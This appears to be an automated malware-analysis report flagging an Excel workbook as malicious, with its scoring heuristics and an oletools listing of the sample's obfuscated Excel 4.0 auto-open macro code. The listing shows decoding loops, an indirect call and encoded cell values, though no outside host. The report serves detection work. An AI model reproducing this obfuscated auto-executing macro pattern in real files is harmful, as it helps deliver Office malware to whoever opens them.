MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6548 bytes |

SHA-256: 579d7ff1984677579a5008b111e745349256f4311ab696e8304162d876b5a576

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - egZ
' 0018 26 LABEL : Cell Value, String Constant - aKTQLsmzJxI len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I184
' 0018 25 LABEL : Cell Value, String Constant - eiOYCMnHtX len=0
' 0018 23 LABEL : Cell Value, String Constant - HBXWBflP len=0
' 0018 20 LABEL : Cell Value, String Constant - HYnhH len=0
' 0018 24 LABEL : Cell Value, String Constant - JFCYCusEA len=0
' 0018 22 LABEL : Cell Value, String Constant - lGfJJUM len=0
' 0018 27 LABEL : Cell Value, String Constant - LiPZXlYQYCaT len=0
' 0018 22 LABEL : Cell Value, String Constant - OYmWwxE len=0
' 0018 20 LABEL : Cell Value, String Constant - pwXnZ len=0
' 0018 27 LABEL : Cell Value, String Constant - RjeLrOkqCjcE len=0
' 0018 21 LABEL : Cell Value, String Constant - rUkUHd len=0
' 0018 27 LABEL : Cell Value, String Constant - SEnEtPTGazdO len=0
' 0018 24 LABEL : Cell Value, String Constant - sVQROjdeY len=0
' 0018 22 LABEL : Cell Value, String Constant - TuQnGpm len=0
' 0018 23 LABEL : Cell Value, String Constant - uPyiDYHP len=0
' 0018 25 LABEL : Cell Value, String Constant - USnkKxGmIQ len=0
' 0018 27 LABEL : Cell Value, String Constant - wPvcSHNmdrJL len=0
' 0018 20 LABEL : Cell Value, String Constant - WvPeJ len=0
' 0018 23 LABEL : Cell Value, String Constant - XaVKmuXL len=0
' 0018 23 LABEL : Cell Value, String Constant - yJkTPqyo len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' egZ,T45,"",303.00000000000000000000
' egZ,T46,"",-823.00000000000000000000
' egZ,T47,"",-616.00000000000000000000
' egZ,T48,"",840.00000000000000000000
' egZ,T49,"",930.00000000000000000000
' egZ,T50,"",516.00000000000000000000
' egZ,I84,"SET.NAME("aKTQLsmzJxI",0+VALUE("0"))",""
' egZ,I88,"SET.NAME("HYnhH",aKTQLsmzJxI)",""
' egZ,I93,"SET.NAME("TuQnGpm",aKTQLsmzJxI)",""
' egZ,I97,"SET.NAME("USnkKxGmIQ",COUNTA(OYmWwxE))",""
' egZ,I101,"SET.NAME("uPyiDYHP",COUNTA(lGfJJUM))",""
' egZ,I105,[],""
' egZ,I108,"SET.NAME("JFCYCusEA","")",""
' egZ,I112,"HYnhH",""
' egZ,I116,"SET.NAME("SEnEtPTGazdO",HLOOKUP("*",OYmWwxE,HYnhH,FALSE))",""
' egZ,I121,"wPvcSHNmdrJL",""
' egZ,I123,"SET.NAME("eiOYCMnHtX",aKTQLsmzJxI)",""
' egZ,I126,[],""
' egZ,I128,"eiOYCMnHtX",""
' egZ,I133,"HBXWBflP",""
' egZ,I138,"XaVKmuXL",""
' egZ,I142,"WvPeJ",""
' egZ,I146,"SET.NAME("LiPZXlYQYCaT",VALUE(HLOOKUP("*",lGfJJUM,WvPeJ,FALSE)))",""
' egZ,I149,"RjeLrOkqCjcE",""
' egZ,I154,"JFCYCusEA",""
' egZ,I158,"TuQnGpm",""
' egZ,I160,NEXT(),""
' egZ,I165,"rUkUHd",""
' egZ,I169,[],""
' egZ,I173,"sVQROjdeY",""
' egZ,I175,NEXT(),""
' egZ,I180,RETURN(),""
' egZ,I209,"SET.NAME("yJkTPqyo",I84)",""
' egZ,I214,"OYmWwxE",""
' egZ,I217,"SET.NAME("lGfJJUM",R93C15)",""
' egZ,I221,"SET.NAME("sVQROjdeY",228)",""
' egZ,I225,"SET.NAME("pwXnZ",9)",""
' egZ,I227,yJkTPqyo(),""
' egZ,I228,HALT(),""